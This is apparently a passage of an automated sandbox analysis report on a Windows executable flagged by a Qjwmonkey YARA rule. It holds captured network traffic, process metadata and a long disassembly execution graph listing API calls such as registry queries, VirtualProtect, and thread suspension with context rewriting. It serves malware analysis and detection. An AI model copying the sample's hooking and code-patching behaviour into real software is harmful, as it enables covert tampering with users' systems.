                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75
                                                                                                                                                                                                        Data Ascii: ntElement||e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)retu


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.54972518.244.18.122443768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC542OUTGET /b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        2025-01-03 14:26:01 UTC435INHTTP/1.1 204 No Content
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 03 Jan 2025 14:26:01 GMT
                                                                                                                                                                                                        set-cookie: UID=1DD555d6637f2e69e913c321735914361; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 cbad29402e4e90baabe7151c3f1203b6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                        X-Amz-Cf-Id: AEAAGNMMXtpOB_QKsnKvle-xa9mEzyem8mGrqShzlRApRyzVgb91bg==


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:09:25:53
                                                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nv8401986_110422.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:668'064 bytes
                                                                                                                                                                                                        MD5 hash:31549917CDC6E3F9D40A48EA5998493F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Qjwmonkey, Description: Yara detected Qjwmonkey, Source: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:8.9%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:8.3%
                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                          Total number of Limit Nodes:85
                                                                                                                                                                                                          execution_graph 88400 40ed40 88401 40ed8a Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 88400->88401 88403 40edce 88401->88403 88404 40ee07 shared_ptr 88401->88404 88581 411190 26 API calls 2 library calls 88401->88581 88403->88404 88407 40ee83 88403->88407 88582 411780 88404->88582 88405 40ee40 88591 4822b0 88405->88591 88409 51b528 std::runtime_error::runtime_error 26 API calls 88407->88409 88411 40ee88 88409->88411 88410 40ee4c shared_ptr 88414 40f7c0 88411->88414 88415 40b650 SimpleUString::operator= 27 API calls 88414->88415 88416 40f877 88415->88416 88417 40b650 SimpleUString::operator= 27 API calls 88416->88417 88418 40f886 88417->88418 88419 40b650 SimpleUString::operator= 27 API calls 88418->88419 88420 40f895 88419->88420 88607 411890 88420->88607 88424 40f8c4 88426 40f91a 88424->88426 88695 411ac0 27 API calls 2 library calls 88424->88695 88427 4107ca 88426->88427 88429 40f99f shared_ptr 88426->88429 88430 51b528 std::runtime_error::runtime_error 26 API calls 88427->88430 88428 40b650 SimpleUString::operator= 27 API calls 88431 40fa41 88428->88431 88429->88428 88432 4107f2 88430->88432 88434 40fa4d shared_ptr 88431->88434 88696 411ac0 27 API calls 2 library calls 88431->88696 88435 40b650 SimpleUString::operator= 27 API calls 88434->88435 88436 40fb0c 88435->88436 88581->88401 88583 411789 88582->88583 88584 4117cc shared_ptr 88582->88584 88767 411f30 26 API calls 3 library calls 88583->88767 88584->88405 88586 411793 88586->88584 88587 51b528 std::runtime_error::runtime_error 26 API calls 88586->88587 88588 4117f4 88587->88588 88768 411f30 26 API calls 3 library calls 88588->88768 88590 41180f 88590->88405 88592 48231a 88591->88592 88593 4822f7 GetExitCodeThread 88591->88593 88596 48232f RtlDeleteCriticalSection 88592->88596 88597 482321 CloseHandle 88592->88597 88594 48230f WaitForSingleObject 88593->88594 88595 482306 88593->88595 88594->88592 88595->88592 88595->88594 88598 482347 88596->88598 88603 48236e shared_ptr 88596->88603 88597->88596 88601 4823d3 88598->88601 88598->88603 88599 4823b1 88602 513805 _com_util::ConvertStringToBSTR 5 API calls 88599->88602 88600 4823a3 CloseHandle 88600->88599 88605 51b528 std::runtime_error::runtime_error 26 API calls 88601->88605 88604 4823cf 88602->88604 88603->88599 88603->88600 88604->88410 88606 4823d8 88605->88606 88721 412030 88607->88721 88609 411905 88610 40b7a0 27 API calls 88609->88610 88611 41191a 88610->88611 88612 40b7a0 27 API calls 88611->88612 88613 40f8a7 88612->88613 88614 40b7a0 88613->88614 88615 40b7ed 88614->88615 88618 40b7b5 SimpleUString::operator= 88614->88618 88731 40d520 27 API calls 5 library calls 88615->88731 88617 40b800 88617->88424 88618->88424 88695->88426 88696->88434 88722 412042 88721->88722 88726 4120a8 shared_ptr 88721->88726 88723 41204b 88722->88723 88722->88726 88727 412067 _Yarn 88722->88727 88730 4122e0 27 API calls 5 library calls 88723->88730 88725 41205c 88725->88609 88726->88609 88727->88726 88728 51b528 std::runtime_error::runtime_error 26 API calls 88727->88728 88729 4120c9 88728->88729 88730->88725 88731->88617 88767->88586 88768->88590 88769 41d140 CoInitialize 88795 5165e0 88769->88795 88772 41d21e 88773 513ac7 std::_Facet_Register 8 API calls 88772->88773 88775 41d225 __Getcvt 88773->88775 88774 513805 _com_util::ConvertStringToBSTR 5 API calls 88776 41d32e 88774->88776 88777 41d23e SetRectEmpty 88775->88777 88778 41d2c1 88777->88778 88797 46b140 88778->88797 88782 41d2d1 88835 417210 88782->88835 88784 41d2dc 88785 41d308 shared_ptr 88784->88785 88786 41d334 88784->88786 88785->88774 88787 51b528 std::runtime_error::runtime_error 26 API calls 88786->88787 88788 41d339 88787->88788 88789 421b40 42 API calls 88788->88789 88790 41d348 88789->88790 88791 41d374 88790->88791 88883 46b3d0 5 API calls _com_util::ConvertStringToBSTR 88790->88883 88793 41d364 88793->88791 88796 41d184 LoadCursorW RegisterClassExW CreateWindowExW 88795->88796 88796->88772 88796->88785 88798 46b17e 88797->88798 88799 46b24a 88797->88799 88800 46b1d8 RtlEnterCriticalSection 88798->88800 88885 5139d3 5 API calls __Init_thread_wait 88798->88885 88801 46b251 GetProcAddress 88799->88801 88802 46b26a CLSIDFromString 88799->88802 88803 46b202 88800->88803 88804 46b238 RtlLeaveCriticalSection 88800->88804 88801->88802 88806 46b280 CoCreateInstance 88802->88806 88819 46b29f 88802->88819 88807 513ac7 std::_Facet_Register 8 API calls 88803->88807 88804->88799 88806->88819 88810 46b209 __Getcvt 88807->88810 88808 513805 _com_util::ConvertStringToBSTR 5 API calls 88811 41d2cc 88808->88811 88809 46b19d 88809->88800 88812 46b1a9 RtlInitializeCriticalSection 88809->88812 88888 46e3f0 6 API calls _com_util::ConvertStringToBSTR 88810->88888 88820 421b40 88811->88820 88886 513d5f 29 API calls __onexit 88812->88886 88814 46b1c1 88887 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 88814->88887 88817 46b229 88817->88804 88818 46b1d5 88818->88800 88819->88808 88821 421b77 88820->88821 88822 421dc8 88820->88822 88823 421bd2 RtlEnterCriticalSection 88821->88823 88889 5139d3 5 API calls __Init_thread_wait 88821->88889 88822->88782 88825 421c00 88823->88825 88826 421da4 RtlLeaveCriticalSection 88823->88826 88828 513ac7 std::_Facet_Register 8 API calls 88825->88828 88826->88782 88827 421b96 88827->88823 88829 421ba2 RtlInitializeCriticalSection 88827->88829 88832 421c0a __Getcvt 88828->88832 88890 513d5f 29 API calls __onexit 88829->88890 88831 421bbe 88891 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 88831->88891 88832->88826 88834 421bcf 88834->88823 88836 417657 88835->88836 88837 41725d 88835->88837 88921 40dee0 27 API calls 3 library calls 88836->88921 88838 40b650 SimpleUString::operator= 27 API calls 88837->88838 88839 4172bb __Getcvt 88838->88839 88892 416f20 88839->88892 88841 417662 88842 513805 _com_util::ConvertStringToBSTR 5 API calls 88841->88842 88843 41768d 88842->88843 88843->88784 88846 4175c1 88847 4175ea 88846->88847 88849 40b650 SimpleUString::operator= 27 API calls 88846->88849 88849->88847 88883->88793 88885->88809 88886->88814 88887->88818 88888->88817 88889->88827 88890->88831 88891->88834 88922 415dc0 88892->88922 88894 416f4a 88895 416f53 GetProcAddress 88894->88895 88896 416f7c RegOpenKeyExW 88894->88896 88895->88896 88897 416fa0 88896->88897 88898 416f94 88896->88898 88900 513805 _com_util::ConvertStringToBSTR 5 API calls 88897->88900 88939 416ea0 44 API calls _com_util::ConvertStringToBSTR 88898->88939 88902 416fad 88900->88902 88901 416f9b 88901->88897 88902->88846 88903 416fc0 88902->88903 88904 415dc0 43 API calls 88903->88904 88921->88841 88923 415ed3 88922->88923 88924 415df7 88922->88924 88923->88894 88925 415e52 RtlEnterCriticalSection 88924->88925 88940 5139d3 5 API calls __Init_thread_wait 88924->88940 88926 415e7c 88925->88926 88927 415eaf RtlLeaveCriticalSection 88925->88927 88929 513ac7 std::_Facet_Register 8 API calls 88926->88929 88927->88894 88931 415e83 __Getcvt 88929->88931 88930 415e16 88930->88925 88932 415e22 RtlInitializeCriticalSection 88930->88932 88943 46b860 6 API calls _com_util::ConvertStringToBSTR 88931->88943 88941 513d5f 29 API calls __onexit 88932->88941 88934 415e3e 88942 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 88934->88942 88937 415e4f 88937->88925 88938 415ea0 88938->88927 88939->88901 88940->88930 88941->88934 88942->88937 88943->88938 90344 41b580 90345 40b650 SimpleUString::operator= 27 API calls 90344->90345 90346 41b5dd 90345->90346 90347 41bf60 42 API calls 90346->90347 90348 41b5e9 90347->90348 90378 483020 90348->90378 90351 40b7a0 27 API calls 90354 41b612 90351->90354 90352 41b650 CreateMutexW 90353 41b6cc GetLastError 90352->90353 90358 41b69a 90352->90358 90359 41b6f1 90353->90359 90360 41b7eb 90353->90360 90354->90352 90355 41b646 shared_ptr 90354->90355 90356 41b7fe 90354->90356 90355->90352 90363 51b528 std::runtime_error::runtime_error 26 API calls 90356->90363 90357 41b6c2 shared_ptr 90357->90353 90358->90357 90361 41b803 90358->90361 90382 41b810 44 API calls 3 library calls 90359->90382 90365 51b528 std::runtime_error::runtime_error 26 API calls 90361->90365 90363->90361 90364 41b701 90366 41b710 CreateFileMappingW 90364->90366 90367 41b70e 90364->90367 90368 41b808 90365->90368 90370 41b735 90366->90370 90372 41b75d shared_ptr 90366->90372 90367->90366 90369 51b528 std::runtime_error::runtime_error 26 API calls 90368->90369 90371 41b80d 90369->90371 90370->90368 90370->90372 90373 41b7d8 CloseHandle 90372->90373 90374 41b77f MapViewOfFile IsWindow 90372->90374 90373->90360 90375 41b7a0 SendMessageW 90374->90375 90376 41b7c7 UnmapViewOfFile CloseHandle 90374->90376 90375->90376 90377 41b7b5 ShowWindow SetForegroundWindow 90375->90377 90376->90373 90377->90376 90379 48305a 90378->90379 90383 482f70 90379->90383 90381 41b5f5 90381->90351 90382->90364 90384 482f85 90383->90384 90385 482f87 MultiByteToWideChar 90383->90385 90384->90385 90386 482ff9 90385->90386 90387 482fa2 90385->90387 90386->90381 90388 482fc8 MultiByteToWideChar 90387->90388 90389 482fe0 90388->90389 90390 40b650 SimpleUString::operator= 27 API calls 90389->90390 90390->90386 91310 424200 91311 424436 91310->91311 91312 42421e 91310->91312 91313 513805 _com_util::ConvertStringToBSTR 5 API calls 91311->91313 91314 424284 GetCurrentThread 91312->91314 91315 42422f GetCurrentThreadId InterlockedCompareExchange 91312->91315 91317 424449 91313->91317 91340 46f543 91314->91340 91315->91314 91318 424243 91315->91318 91320 42425c 91318->91320 91321 42427d 91318->91321 91319 424291 GetCurrentThreadId 91325 42429f 91319->91325 91337 4242b9 shared_ptr 91319->91337 91320->91321 91322 424260 VirtualProtect 91320->91322 91321->91314 91322->91320 91324 4242c8 GetLastError 91322->91324 91324->91321 91326 513ac7 std::_Facet_Register 8 API calls 91325->91326 91325->91337 91328 4242d7 91326->91328 91327 424326 91332 42435c 91327->91332 91373 46ebc4 VirtualQuery _Atexit 91327->91373 91328->91327 91333 4242fa 91328->91333 91371 46ebc4 VirtualQuery _Atexit 91328->91371 91329 42438e 91336 4243bf VirtualProtect 91329->91336 91329->91337 91332->91329 91374 46ebc4 VirtualQuery _Atexit 91332->91374 91333->91327 91372 46ebc4 VirtualQuery _Atexit 91333->91372 91338 4243e0 91336->91338 91339 4243d8 GetLastError 91336->91339 91349 46f28e GetCurrentThreadId 91337->91349 91338->91337 91339->91337 91341 46f54f GetCurrentThread 91340->91341 91342 46f5aa 91340->91342 91343 46f55d 91341->91343 91344 46f559 91341->91344 91342->91319 91345 513ac7 std::_Facet_Register 8 API calls 91343->91345 91344->91319 91346 46f565 SuspendThread 91345->91346 91347 46f574 GetLastError 91346->91347 91348 46f584 shared_ptr 91346->91348 91347->91348 91348->91342 91350 46f2b9 91349->91350 91363 46f2af 91349->91363 91351 46f2c2 91350->91351 91367 46f2cc _Yarn 91350->91367 91381 46f1cd 11 API calls 2 library calls 91351->91381 91353 513805 _com_util::ConvertStringToBSTR 5 API calls 91355 46f541 91353->91355 91354 46f2c7 91354->91363 91355->91311 91356 46f415 GetCurrentProcess 91358 46f427 VirtualProtect FlushInstructionCache 91356->91358 91366 46f483 91356->91366 91357 46f338 GetThreadContext 91357->91367 91360 46f457 shared_ptr 91358->91360 91359 46f4f9 91375 46ee5f GetCurrentProcess 91359->91375 91360->91358 91360->91366 91363->91353 91364 46f508 ResumeThread 91365 46f51b shared_ptr 91364->91365 91365->91363 91365->91364 91366->91359 91369 46f4d6 VirtualFree 91366->91369 91367->91356 91367->91357 91368 46f3a0 SetThreadContext 91367->91368 91368->91367 91369->91366 91371->91333 91372->91327 91373->91332 91374->91329 91376 46ee82 91375->91376 91379 46eea6 91375->91379 91377 46ee88 VirtualProtect FlushInstructionCache 91376->91377 91377->91377 91377->91379 91378 513805 _com_util::ConvertStringToBSTR 5 API calls 91380 46eeb3 91378->91380 91379->91378 91380->91363 91380->91364 91381->91354 91382 403a10 91384 403a5a Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91382->91384 91383 403ac8 shared_ptr 91386 4822b0 31 API calls 91383->91386 91384->91383 91385 403a8f 91384->91385 91438 4050c0 91384->91438 91385->91383 91389 403b35 91385->91389 91387 403afe shared_ptr 91386->91387 91390 51b528 std::runtime_error::runtime_error 26 API calls 91389->91390 91391 403b3a 91390->91391 91394 4041f0 91391->91394 91395 483970 63 API calls 91394->91395 91396 4042ae 91395->91396 91397 4042c5 91396->91397 91398 483970 63 API calls 91396->91398 91587 4059d0 RegOpenKeyExW 91397->91587 91400 4042ba 91398->91400 91400->91397 91531 4045e0 RegOpenKeyExW 91400->91531 91439 4050fd shared_ptr 91438->91439 91440 405174 shared_ptr 91439->91440 91441 51b528 std::runtime_error::runtime_error 26 API calls 91439->91441 91440->91384 91442 4051a9 shared_ptr 91441->91442 91443 405254 shared_ptr 91442->91443 91444 51b528 std::runtime_error::runtime_error 26 API calls 91442->91444 91443->91384 91445 40529d RegOpenKeyExW 91444->91445 91447 40539b __Getcvt 91445->91447 91455 405968 shared_ptr 91445->91455 91449 4053ad RegQueryValueExW RegCloseKey 91447->91449 91448 513805 _com_util::ConvertStringToBSTR 5 API calls 91450 4059a6 91448->91450 91451 405480 91449->91451 91450->91384 91451->91451 91452 40b650 SimpleUString::operator= 27 API calls 91451->91452 91456 4054a2 91452->91456 91453 405920 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91453->91455 91458 4059bc 91453->91458 91454 4054fd 91459 40b7a0 27 API calls 91454->91459 91455->91448 91456->91453 91456->91454 91457 40b7a0 27 API calls 91456->91457 91457->91454 91460 51b528 std::runtime_error::runtime_error 26 API calls 91458->91460 91461 4055d5 91459->91461 91462 4059c1 RegOpenKeyExW 91460->91462 91463 408050 43 API calls 91461->91463 91466 405ac2 __Getcvt 91462->91466 91467 405c58 91462->91467 91465 4055ee 91463->91465 91469 405610 91465->91469 91470 4055f7 GetProcAddress 91465->91470 91472 405ad4 RegQueryValueExW RegCloseKey 91466->91472 91468 513805 _com_util::ConvertStringToBSTR 5 API calls 91467->91468 91471 405c70 91468->91471 91469->91453 91474 470690 27 API calls 91469->91474 91470->91469 91471->91384 91472->91467 91473 405b55 91472->91473 91475 40b650 SimpleUString::operator= 27 API calls 91473->91475 91476 40563d __Getcvt 91474->91476 91477 405be8 91475->91477 91481 475ef0 27 API calls 91476->91481 91478 405c33 91477->91478 91479 405bf6 91477->91479 91482 405c26 91478->91482 92376 40cb30 141 API calls 3 library calls 91478->92376 92374 40dee0 27 API calls 3 library calls 91479->92374 91485 40565f __Getcvt 91481->91485 91486 4050c0 134 API calls 91482->91486 91484 405c13 92375 40dee0 27 API calls 3 library calls 91484->92375 91488 40a120 80 API calls 91485->91488 91486->91467 91489 405684 91488->91489 92367 40a000 108 API calls 91489->92367 91491 4056ab 91492 476080 87 API calls 91491->91492 91493 4056c6 91492->91493 91494 4058f7 91493->91494 91496 471d90 27 API calls 91493->91496 91532 4046e4 __Getcvt 91531->91532 91540 404d89 shared_ptr 91531->91540 91535 4046f6 RegQueryValueExW RegCloseKey 91532->91535 91533 513805 _com_util::ConvertStringToBSTR 5 API calls 91534 404dc7 91533->91534 91534->91397 91536 4047c2 91535->91536 91536->91536 91537 40b650 SimpleUString::operator= 27 API calls 91536->91537 91541 4047e4 91537->91541 91538 404d41 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91538->91540 91542 404dce 91538->91542 91539 40483f 91544 40b7a0 27 API calls 91539->91544 91540->91533 91541->91538 91541->91539 91543 40b7a0 27 API calls 91541->91543 91545 51b528 std::runtime_error::runtime_error 26 API calls 91542->91545 91543->91539 91546 4048ef 91544->91546 91547 404dd3 91545->91547 91548 408050 43 API calls 91546->91548 91549 404908 91548->91549 91550 404911 GetProcAddress 91549->91550 91551 40492a 91549->91551 91550->91551 91551->91538 91552 470690 27 API calls 91551->91552 91553 404957 __Getcvt 91552->91553 91554 475ef0 27 API calls 91553->91554 91555 404979 __Getcvt 91554->91555 91896 40a120 91555->91896 91588 405ac2 __Getcvt 91587->91588 91589 405c58 91587->91589 91592 405ad4 RegQueryValueExW RegCloseKey 91588->91592 91590 513805 _com_util::ConvertStringToBSTR 5 API calls 91589->91590 91591 4042d3 91590->91591 91604 405c80 91591->91604 91592->91589 91593 405b55 91592->91593 91594 40b650 SimpleUString::operator= 27 API calls 91593->91594 91595 405be8 91594->91595 91596 405c33 91595->91596 91597 405bf6 91595->91597 91599 405c26 91596->91599 92215 40cb30 141 API calls 3 library calls 91596->92215 92213 40dee0 27 API calls 3 library calls 91597->92213 91602 4050c0 141 API calls 91599->91602 91601 405c13 92214 40dee0 27 API calls 3 library calls 91601->92214 91602->91589 91605 405cda __Getcvt 91604->91605 91606 408180 43 API calls 91605->91606 91607 405ce2 91606->91607 91608 405cf1 GetProcAddress 91607->91608 91609 405d14 91607->91609 91608->91609 91637 4061ef Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91609->91637 92216 51ac8c 91609->92216 91610 513805 _com_util::ConvertStringToBSTR 5 API calls 91612 4042da 91610->91612 91658 406230 91612->91658 91614 408050 43 API calls 91615 405d73 91614->91615 91616 405d91 PathFileExistsA 91615->91616 91617 405d7c GetProcAddress 91615->91617 91618 405da5 91616->91618 91616->91637 91617->91616 91619 470690 27 API calls 91618->91619 91620 405dc4 __Getcvt 91619->91620 91621 475ef0 27 API calls 91620->91621 91637->91610 91659 40628a __Getcvt 91658->91659 91660 408180 43 API calls 91659->91660 91661 406292 91660->91661 91662 40629b GetProcAddress 91661->91662 91663 4062c2 91661->91663 91662->91663 91663->91663 91667 40633e SimpleUString::operator= 91663->91667 91685 407351 shared_ptr 91663->91685 92279 40d7e0 27 API calls 5 library calls 91663->92279 91664 513805 _com_util::ConvertStringToBSTR 5 API calls 91665 4042e1 91664->91665 91754 407510 91665->91754 91669 4063ab SimpleUString::operator= 91667->91669 92280 40d7e0 27 API calls 5 library calls 91667->92280 91670 408050 43 API calls 91669->91670 91685->91664 91933 4035b0 91896->91933 91934 403470 41 API calls 91933->91934 92213->91601 92214->91599 92215->91599 92217 51aca8 92216->92217 92219 51ac9a 92216->92219 92236 51ea9c 20 API calls _free 92217->92236 92219->92217 92222 51acd1 92219->92222 92221 405d6b 92221->91614 92222->92221 92238 51ea9c 20 API calls _free 92222->92238 92224 51acb0 92237 51b518 26 API calls std::runtime_error::runtime_error 92224->92237 92236->92224 92237->92221 92238->92224 92279->91667 92280->91669 92367->91491 92374->91484 92375->91482 92376->91482 91235 43b250 91244 4266e0 91235->91244 91239 43b275 91240 43b27e FreeLibrary 91239->91240 91241 43b28c 91239->91241 91240->91241 91242 43b293 FreeLibrary 91241->91242 91243 43b2a1 91241->91243 91242->91243 91245 433370 10 API calls 91244->91245 91246 42670a IsWindow 91245->91246 91247 426726 PeekMessageW 91246->91247 91248 42677d shared_ptr 91247->91248 91249 513805 _com_util::ConvertStringToBSTR 5 API calls 91248->91249 91250 4268c6 91249->91250 91251 43bcd0 42 API calls 2 library calls 91250->91251 91251->91239 92579 44ce90 92580 44ced6 92579->92580 92581 44d0be 92579->92581 92582 44cedc 92580->92582 92583 44d068 92580->92583 92584 44d31c 92581->92584 92585 44d0ca 92581->92585 92586 44cee7 92582->92586 92587 44d042 92582->92587 92592 44d076 SetEvent 92583->92592 92649 44cf9d shared_ptr 92583->92649 92588 44d4ee 92584->92588 92589 44d328 92584->92589 92590 44d0d0 92585->92590 92591 44d308 92585->92591 92594 44cef2 92586->92594 92595 44cfc3 92586->92595 92598 44d050 92587->92598 92587->92649 92614 44d545 ShowWindow 92588->92614 92588->92649 92596 44d4d6 92589->92596 92597 44d32e 92589->92597 92603 44d22c 92590->92603 92604 44d0ed 92590->92604 92605 44d24f 92590->92605 92606 44d2d8 92590->92606 92607 44d209 92590->92607 92590->92649 92593 44d310 PostQuitMessage 92591->92593 92591->92649 92599 44d083 92592->92599 92600 44d0aa PostMessageW 92592->92600 92593->92649 92611 44cf03 92594->92611 92612 44cf0d 92594->92612 92594->92649 92619 44cff7 92595->92619 92595->92649 92601 44d4e3 92596->92601 92596->92649 92602 44d3fc 92597->92602 92650 44d33b 92597->92650 92921 450310 393 API calls 3 library calls 92598->92921 92609 44d09c 92599->92609 92610 44d08d SetWindowTextA 92599->92610 92600->92649 92930 450080 554 API calls 2 library calls 92601->92930 92602->92649 92913 43be40 92602->92913 92617 44d23a 92603->92617 92603->92649 92604->92649 92705 438b20 105 API calls 8 library calls 92604->92705 92618 44d266 92605->92618 92641 44d27a 92605->92641 92605->92649 92623 44d2ef 92606->92623 92606->92641 92606->92649 92616 44d217 92607->92616 92607->92649 92685 4511c0 92609->92685 92610->92609 92916 4549e0 124 API calls 2 library calls 92611->92916 92621 44cfa2 92612->92621 92622 44cf19 92612->92622 92625 408180 43 API calls 92614->92625 92923 450310 393 API calls 3 library calls 92616->92923 92924 450310 393 API calls 3 library calls 92617->92924 92630 43be40 10 API calls 92618->92630 92632 44cffc GetTickCount 92619->92632 92633 44d01f GetTickCount 92619->92633 92639 44cfb1 KillTimer 92621->92639 92621->92649 92634 41bf60 42 API calls 92622->92634 92635 43be40 10 API calls 92623->92635 92637 44d555 92625->92637 92628 513805 _com_util::ConvertStringToBSTR 5 API calls 92640 44d5bb 92628->92640 92630->92641 92631 41bf60 42 API calls 92642 44d289 GetTickCount 92631->92642 92632->92649 92633->92649 92643 44cf24 92634->92643 92635->92641 92636 44d426 92636->92649 92927 49c5e0 28 API calls 92636->92927 92644 44d55f GetProcAddress 92637->92644 92682 44cf08 shared_ptr 92637->92682 92638 44d12e 92706 446140 44 API calls 3 library calls 92638->92706 92920 4546a0 201 API calls 2 library calls 92639->92920 92641->92631 92647 44d2c2 92642->92647 92643->92649 92917 49c5e0 28 API calls 92643->92917 92644->92682 92925 451470 282 API calls 3 library calls 92647->92925 92649->92628 92650->92649 92926 43fad0 114 API calls 2 library calls 92650->92926 92651 44d133 92707 41d430 135 API calls 6 library calls 92651->92707 92652 44d441 92652->92649 92928 43d6b0 52 API calls 4 library calls 92652->92928 92657 44d13c 92658 44d155 92657->92658 92708 446140 44 API calls 3 library calls 92657->92708 92922 436530 154 API calls 6 library calls 92658->92922 92662 44d150 92709 41d9d0 92662->92709 92663 44d15d 92834 4385c0 92663->92834 92667 44cf48 92667->92649 92918 49de80 121 API calls 2 library calls 92667->92918 92669 44d45a 92670 44d4ac shared_ptr 92669->92670 92676 44d5c6 92669->92676 92929 49ddf0 90 API calls 92670->92929 92675 44cf95 92919 49ddf0 90 API calls 92675->92919 92677 51b528 std::runtime_error::runtime_error 26 API calls 92676->92677 92680 44d5cb 92677->92680 92682->92649 92686 451206 92685->92686 92699 451253 92685->92699 92689 490850 75 API calls 92686->92689 92691 451221 92689->92691 92695 4909a0 182 API calls 92691->92695 92691->92699 92692 45127c 93027 41cb80 133 API calls 6 library calls 92692->93027 92693 45128f 93028 446140 44 API calls 3 library calls 92693->93028 92697 451236 92695->92697 92697->92699 93024 49c5e0 28 API calls 92697->93024 92698 451294 92700 513ac7 std::_Facet_Register 8 API calls 92698->92700 92699->92693 92931 451f10 92699->92931 92702 45129d GetCurrentProcessId SendMessageW 92700->92702 92702->92649 92703 451247 92703->92699 93025 49ddf0 90 API calls 92703->93025 92705->92638 92706->92651 92707->92657 92708->92662 92710 470690 27 API calls 92709->92710 92711 41da30 92710->92711 92713 41da7a 92711->92713 93053 41ed10 92711->93053 92714 41bf60 42 API calls 92713->92714 92715 41da7f 92714->92715 93343 470880 92715->93343 92718 471d90 27 API calls 92719 41daab 92718->92719 92720 470dd0 27 API calls 92719->92720 92721 41dab2 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 92720->92721 92722 47f270 87 API calls 92721->92722 92723 41dae3 92722->92723 92724 41dddc 92723->92724 93347 4220f0 27 API calls SimpleUString::operator= 92723->93347 92835 4385db 92834->92835 93464 437ed0 92835->93464 92837 43862f 92838 438638 92837->92838 92839 43864c 92837->92839 92840 437ed0 47 API calls 92838->92840 93483 4329e0 108 API calls 7 library calls 92839->93483 92840->92839 92842 4386d1 __Getcvt 92843 41bdd0 42 API calls 92842->92843 92844 438714 92843->92844 92845 438721 92844->92845 92846 438846 92844->92846 92914 513ac7 